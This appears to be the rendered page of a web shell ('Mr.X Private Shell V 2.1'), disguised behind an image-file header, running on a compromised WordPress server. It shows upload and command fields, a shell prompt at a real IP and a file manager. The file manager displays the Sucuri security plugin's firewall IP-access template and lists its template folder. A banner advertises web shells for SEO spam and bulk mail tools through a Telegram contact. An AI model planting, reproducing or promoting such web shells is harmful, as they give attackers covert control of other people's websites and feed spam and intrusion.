����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<script type="text/javascript">
/* global jQuery */
/* jshint forin: false */
/* jshint camelcase: false */
jQuery(document).ready(function ($) {
    var sucuriscanLoadIPAccess = function () {
        // $('.sucuriscan-ipaccess-table tbody').html('<tr>' +
        // '<td colspan="2">Loading...</td></tr>');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_ipaccess',
        }, function (data) {
            $('.sucuriscan-ipaccess-table tbody').html('');

            for (var i in data.blocklist) {
                $('.sucuriscan-ipaccess-table tbody').append('<tr>' +
                '<td><span class="sucuriscan-monospace">' + data.blocklist[i] + '</span></td>' +
                '<td><button class="button button-primary sucuriscan-deblocklist" ' +
                'data-cy="' + data.blocklist[i] + '" ' +
                'ip="' + data.blocklist[i] + '">{{Delete}}</button></td>' +
                '</tr>');
            }
        });
    };

    var sucuriscanPrintStatus = function (button, data) {
        button.attr('disabled', false);
        button.html('{{Submit}}');

        if (data.ok) {
            sucuriscanLoadIPAccess();

            $('#sucuriscan-ipaccess-response').html('<div '+
            'class="sucuriscan-inline-alert-success"><p>' +
            data.msg + '</p></div>');
        } else {
            $('#sucuriscan-ipaccess-response').html('<div '+
            'class="sucuriscan-inline-alert-error"><p>' +
            data.msg + '</p></div>');
        }
    };

    $('.sucuriscan-container').on('click', '.sucuriscan-ipaccess-button', function (event) {
        event.preventDefault();

        var button = $(this);
        var ip = $('.sucuriscan-ipaccess-form input[name=sucuriscan_ip]').val();

        button.attr('disabled', true);
        button.html('{{Loading...}}');
        $('#sucuriscan-ipaccess-response').html('');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_blocklist',
            ip: ip,
        }, function (data) {
            sucuriscanPrintStatus(button, data);
        });
    });

    $('.sucuriscan-container').on('click', '.sucuriscan-deblocklist', function (event) {
        event.preventDefault();

        var button = $(this);

        button.attr('disabled', true);
        button.html('{{Loading...}}');
        $('#sucuriscan-ipaccess-response').html('');

        $.post('%%SUCURI.AjaxURL.Firewall%%', {
            action: 'sucuriscan_ajax',
            sucuriscan_page_nonce: '%%SUCURI.PageNonce%%',
            form_action: 'firewall_deblocklist',
            ip: button.attr('ip'),
        }, function (data) {
            sucuriscanPrintStatus(button, data);
        });
    });

    sucuriscanLoadIPAccess();
});
</script>

<div class="sucuriscan-panel">
    <h3 class="sucuriscan-title">{{IP Address Access}}</h3>

    <div class="inside">
        <p>{{This tool allows you to add one or more IP addresses to the blocklist and stop them from accessing your website.}}</p>
        <p>{{To delete an IP from the blocklist you can use the form below or you can log into the Firewall dashboard.}}</p>

        <div id="sucuriscan-ipaccess-response"></div>

        <form action="%%SUCURI.URL.Firewall%%#ipaccess" method="post" class="sucuriscan-ipaccess-form">
            <input type="hidden" name="sucuriscan_blocklist_ip" value="true" />
            <fieldset class="sucuriscan-clearfix">
                <label>{{Add IP to the Blocklist:}}</label>
                <input type="text" name="sucuriscan_ip" data-cy="sucuriscan_ip_access_input" placeholder="{{e.g. 192.168.1.54}}" />
                <button class="button button-primary sucuriscan-ipaccess-button" data-cy="sucuriscan_ip_access_submit">{{Submit}}</button>
            </fieldset>
        </form>

        <table class="wp-list-table widefat sucuriscan-table sucuriscan-ipaccess-table">
            <thead>
                <tr>
                    <th>{{IP Address}}</th>
                    <th>&nbsp;</th>
                </tr>
            </thead>

            <tbody>
                <tr><td colspan="2">{{Loading...}}</td></tr>
            </tbody>
        </table>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
auditlogs.html.tpl File 5.28 KB 0644
auditlogs.snippet.tpl File 1.68 KB 0644
base.html.tpl File 1.9 KB 0644
dashboard.html.tpl File 3.38 KB 0644
firewall-auditlogs.html.tpl File 3.27 KB 0644
firewall-auditlogs.snippet.tpl File 1.96 KB 0644
firewall-clearcache.html.tpl File 6.39 KB 0644
firewall-ipaccess.html.tpl File 4.29 KB 0644
firewall-settings.html.tpl File 4.04 KB 0644
firewall.html.tpl File 1004 B 0644
index.html File 38 B 0644
integrity-correct.html.tpl File 1.26 KB 0644
integrity-diff-utility.html.tpl File 1.64 KB 0644
integrity-incorrect.html.tpl File 10.1 KB 0644
integrity-incorrect.snippet.tpl File 4.21 KB 0644
integrity-notification.html.tpl File 1.32 KB 0644
integrity.html.tpl File 1.5 KB 0644
lastlogins-admins-lastlogin.snippet.tpl File 207 B 0644
lastlogins-admins.html.tpl File 863 B 0644
lastlogins-admins.snippet.tpl File 878 B 0644
lastlogins-all.html.tpl File 1.88 KB 0644
lastlogins-all.snippet.tpl File 484 B 0644
lastlogins-failedlogins.html.tpl File 2.69 KB 0644
lastlogins-failedlogins.snippet.tpl File 334 B 0644
lastlogins-loggedin.html.tpl File 883 B 0644
lastlogins-loggedin.snippet.tpl File 496 B 0644
lastlogins.html.tpl File 1.04 KB 0644
modalwindow.html.tpl File 533 B 0644
notification-admin.html.tpl File 296 B 0644
notification-pretty.html.tpl File 2.06 KB 0644
notification-simple.html.tpl File 209 B 0644
register-site.html.tpl File 2.72 KB 0644
settings-alerts-bruteforce.html.tpl File 1.32 KB 0644
settings-alerts-events.html.tpl File 1.71 KB 0644
settings-alerts-events.snippet.tpl File 322 B 0644
settings-alerts-ignore-posts.html.tpl File 3.65 KB 0644
settings-alerts-ignore-posts.snippet.tpl File 422 B 0644
settings-alerts-perhour.html.tpl File 1.04 KB 0644
settings-alerts-recipients.html.tpl File 1.98 KB 0644
settings-alerts-recipients.snippet.tpl File 255 B 0644
settings-alerts-subject.html.tpl File 1.43 KB 0644
settings-alerts-subject.snippet.tpl File 220 B 0644
settings-alerts-trustedips.html.tpl File 2.47 KB 0644
settings-alerts-trustedips.snippet.tpl File 410 B 0644
settings-apirecovery.html.tpl File 1.29 KB 0644
settings-apiregistered.html.tpl File 1.06 KB 0644
settings-apiservice-checksums.html.tpl File 1.55 KB 0644
settings-apiservice-proxy.html.tpl File 1.14 KB 0644
settings-apiservice-status.html.tpl File 2.8 KB 0644
settings-general-apikey.html.tpl File 2.56 KB 0644
settings-general-datastorage.html.tpl File 2.07 KB 0644
settings-general-datastorage.snippet.tpl File 3.31 KB 0644
settings-general-importexport.html.tpl File 1.66 KB 0644
settings-general-ipdiscoverer.html.tpl File 2.44 KB 0644
settings-general-resetoptions.html.tpl File 1.2 KB 0644
settings-general-reverseproxy.html.tpl File 1.58 KB 0644
settings-general-selfhosting.html.tpl File 1.8 KB 0644
settings-general-timezone.html.tpl File 1.32 KB 0644
settings-hardening-allowlist-phpfiles.html.tpl File 2.74 KB 0644
settings-hardening-allowlist-phpfiles.snippet.tpl File 383 B 0644
settings-hardening-options.snippet.tpl File 3.21 KB 0644
settings-posthack-available-updates-alert.html.tpl File 685 B 0644
settings-posthack-available-updates.html.tpl File 1.64 KB 0644
settings-posthack-available-updates.snippet.tpl File 554 B 0644
settings-posthack-reset-password-alert.html.tpl File 558 B 0644
settings-posthack-reset-password.html.tpl File 2.78 KB 0644
settings-posthack-reset-password.snippet.tpl File 616 B 0644
settings-posthack-reset-plugins.html.tpl File 3.65 KB 0644
settings-posthack-reset-plugins.snippet.tpl File 852 B 0644
settings-posthack-security-keys.html.tpl File 3.36 KB 0644
settings-posthack-security-keys.snippet.tpl File 237 B 0644
settings-scanner-cronjobs.html.tpl File 3.71 KB 0644
settings-scanner-cronjobs.snippet.tpl File 447 B 0644
settings-scanner-ignore-folders.html.tpl File 2.16 KB 0644
settings-scanner-ignore-folders.snippet.tpl File 316 B 0644
settings-scanner-integrity-cache.html.tpl File 1.84 KB 0644
settings-scanner-integrity-cache.snippet.tpl File 496 B 0644
settings-scanner-integrity-diff-utility.html.tpl File 1.24 KB 0644
settings-webinfo-details.html.tpl File 334 B 0644
settings-webinfo-details.snippet.tpl File 175 B 0644
settings-webinfo-htaccess.html.tpl File 2.05 KB 0644
settings.html.tpl File 3.59 KB 0644
sitecheck-blocklist.html.tpl File 266 B 0644
sitecheck-blocklist.snippet.tpl File 177 B 0644
sitecheck-details.html.tpl File 374 B 0644
sitecheck-details.snippet.tpl File 167 B 0644
sitecheck-malware.html.tpl File 1.21 KB 0644
sitecheck-malware.snippet.tpl File 436 B 0644
sitecheck-recommendations.html.tpl File 277 B 0644
sitecheck-recommendations.snippet.tpl File 245 B 0644
sitecheck-target.html.tpl File 1.63 KB 0644
wordpress-recommendations.html.tpl File 353 B 0644
wordpress-recommendations.snippet.tpl File 179 B 0644